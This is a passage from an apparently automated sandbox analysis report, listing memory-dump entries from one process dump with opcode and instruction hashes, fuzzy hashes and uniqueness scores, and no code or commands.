                                          • Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cc9413bf5d39e3fe553d303f6db35e55da6863dceab52598e4a0462850fa5c91
                                          • Instruction ID: b1febef3bd94c7c0f3fcea66eb9798a0af2c34e0448d577b693bdd848bba4346
                                          • Opcode Fuzzy Hash: cc9413bf5d39e3fe553d303f6db35e55da6863dceab52598e4a0462850fa5c91
                                          • Instruction Fuzzy Hash: 30617E70204B428FD725DF29C49076AB7FAAF99310F14CA2DC4DA87B66DB74F8468B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 11b328897fd8c5593f77a9c96e6642f7d7776c313c43259469ef2bab3a2073f1
                                          • Instruction ID: 260deddb7676fc5d2d9f651c78284700d1f02bfc92b27f2a5678fcce7cc7314b
                                          • Opcode Fuzzy Hash: 11b328897fd8c5593f77a9c96e6642f7d7776c313c43259469ef2bab3a2073f1
                                          • Instruction Fuzzy Hash: F851E035208315DFC724CF69D88086EBBFEFFC52157048A6EE0D787A41D730AA048B92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d8d415ed4461b02914b988d6b64c36fb4b2e265b964202c813622cd861009d5e
                                          • Instruction ID: 9a94048c2eaa8f49faf44134ff35623d6854b0482bfde58c1be77073537b9ba5
                                          • Opcode Fuzzy Hash: d8d415ed4461b02914b988d6b64c36fb4b2e265b964202c813622cd861009d5e
                                          • Instruction Fuzzy Hash: C211FE9244F3D55FD31363381D76AE93F649E13054B0E49DBD0D6CB8A7D908880BA726
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e56fb4e8f42ca0f0ba8f6fab0854df1ceea6014f0af6ec48bf701940ba8c23b6
                                          • Instruction ID: 8211931c5ec8765b7dbabc7b7a2546079dfffd69db76ed57665eb12e61c760c9
                                          • Opcode Fuzzy Hash: e56fb4e8f42ca0f0ba8f6fab0854df1ceea6014f0af6ec48bf701940ba8c23b6
                                          • Instruction Fuzzy Hash: 0641DC31A40705CFCB14DFA4D85069EB7B2FFC8314B108A6DE646ABB50EF75AD018B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions